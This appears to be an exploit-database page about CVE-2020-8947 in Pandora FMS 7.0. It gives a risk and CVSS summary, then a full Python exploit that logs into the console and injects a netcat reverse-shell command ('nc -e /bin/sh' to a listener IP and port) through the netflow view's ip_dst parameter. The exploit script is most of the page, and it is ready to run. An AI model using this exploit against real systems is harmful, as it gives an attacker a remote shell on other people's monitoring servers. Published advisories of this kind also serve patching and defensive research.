Pandora FMS 7.0 Authenticated Remote Code Execution

2020.02.14
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution # Date: 2020-02-12 # Exploit Author: Engin Demirbilek # Vendor homepage: http://pandorafms.org/ # Version: 7.0 # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Tested on: CentOS # CVE: CVE-2020-8947 #!/bin/python ''' PANDORAFMS 7.0 Authenticated Remote Code Execution x4 This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS. incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port Author: Engin Demirbilek Github: github.com/EnginDemirbilek CVE: CVE-2020-8947 ''' import requests import sys if len(sys.argv) < 6: print "Usage: ./exploit.py http://url username password listenerIP listenerPort" exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#' login = { 'nick':user, 'pass':password, 'login_button':'Login' } req = requests.Session() print "Sendin login request ..." login = req.post(url+"/pandora_console/index.php?login=1", data=login) payload = { 'date':"", 'time':"", 'period':"", 'interval_length':"", 'chart_type':"", 'max_aggregates':"1", 'address_resolution':"0", 'name':"", 'assign_group':"0", 'filter_type':"0", 'filter_id':"0", 'filter_selected':"0", 'ip_dst':payload, 'ip_src':"", 'dst_port':"", 'src_port':"", 'advanced_filter':"", 'aggregate':"dstip", 'router_ip':"", 'output':"bytes", 'draw_button':"Draw" } print "[+] Sendin exploit ..." exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={ 'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded'}) if exploit.status_code == 200: print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port." else: print "[-] Couldn't send the HTTP request, try again."


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top